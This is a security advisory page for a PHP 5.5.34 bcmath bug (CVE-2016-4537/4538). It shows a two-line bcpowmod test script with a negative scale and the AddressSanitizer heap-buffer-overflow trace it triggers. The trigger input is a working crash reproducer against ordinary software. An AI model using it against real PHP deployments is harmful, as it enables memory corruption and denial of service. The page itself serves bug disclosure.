PHP 5.5.34 bcpowmod accepts negative scale and corrupts _one_ definition

2016.05.06
Credit: fernando
Risk: Low
Local: Yes
Remote: No
CVE: CVE-2016-4537 | CVE-2016-4538
CWE: N/A

Description: ------------ Run with ASAN Test script: --------------- <?php bcpowmod(1, "A", 128, -200); bcpowmod(1, 1.2, 1, 1); Expected result: ---------------- No crash Actual result: -------------- bc math warning: non-zero scale in exponent ================================================================= ==15893==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb3805f68 at pc 0x083fd271 bp 0xbf91e4d8 sp 0xbf91e4c8 READ of size 1 at 0xb3805f68 thread T0 #0 0x83fd270 in bc_divide /home/fmunozs/phpgit/php56/ext/bcmath/libbcmath/src/div.c:122 #1 0x83fff96 in bc_raisemod /home/fmunozs/phpgit/php56/ext/bcmath/libbcmath/src/raisemod.c:69 #2 0x83f9923 in zif_bcpowmod /home/fmunozs/phpgit/php56/ext/bcmath/bcmath.c:426 #3 0x9a7c718 in zend_do_fcall_common_helper_SPEC /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:558 #4 0x9640316 in execute_ex /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:363 #5 0x9a6c9c8 in zend_execute /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:388 #6 0x9470b59 in zend_execute_scripts /home/fmunozs/phpgit/php56/Zend/zend.c:1341 #7 0x91acc6b in php_execute_script /home/fmunozs/phpgit/php56/main/main.c:2613 #8 0x9a8648a in do_cli /home/fmunozs/phpgit/php56/sapi/cli/php_cli.c:994 #9 0x808a502 in main /home/fmunozs/phpgit/php56/sapi/cli/php_cli.c:1378 #10 0xb6dbe645 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18645) #11 0x808aaba (/home/fmunozs/phpgit/php56/sapi/cli/php+0x808aaba) 0xb3805f68 is located 8 bytes to the left of 8-byte region [0xb3805f70,0xb3805f78) freed by thread T0 here: #0 0xb726f9f4 in free (/usr/lib/i386-linux-gnu/libasan.so.2+0x969f4) #1 0xb334c911 (/usr/lib/i386-linux-gnu/libtasn1.so.6+0xa911) previously allocated by thread T0 here: #0 0xb726fd06 in malloc (/usr/lib/i386-linux-gnu/libasan.so.2+0x96d06) #1 0xb334c17e (/usr/lib/i386-linux-gnu/libtasn1.so.6+0xa17e) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/fmunozs/phpgit/php56/ext/bcmath/libbcmath/src/div.c:122 bc_divide Shadow bytes around the buggy address: 0x36700b90: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 0x36700ba0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 0x36700bb0: fa fa fd fa fa fa 00 00 fa fa fd fa fa fa fd fa 0x36700bc0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 0x36700bd0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa =>0x36700be0: fa fa fd fa fa fa fd fa fa fa fd fa fa[fa]fd fa 0x36700bf0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 0x36700c00: fa fa 01 fa fa fa 01 fa fa fa 01 fa fa fa 00 06 0x36700c10: fa fa 00 03 fa fa 00 05 fa fa 00 06 fa fa 00 07 0x36700c20: fa fa 00 00 fa fa 00 07 fa fa 00 00 fa fa 00 05 0x36700c30: fa fa 00 07 fa fa 00 07 fa fa 00 00 fa fa 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==15893==ABORTING

References:

https://bugs.php.net/bug.php?id=72093


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top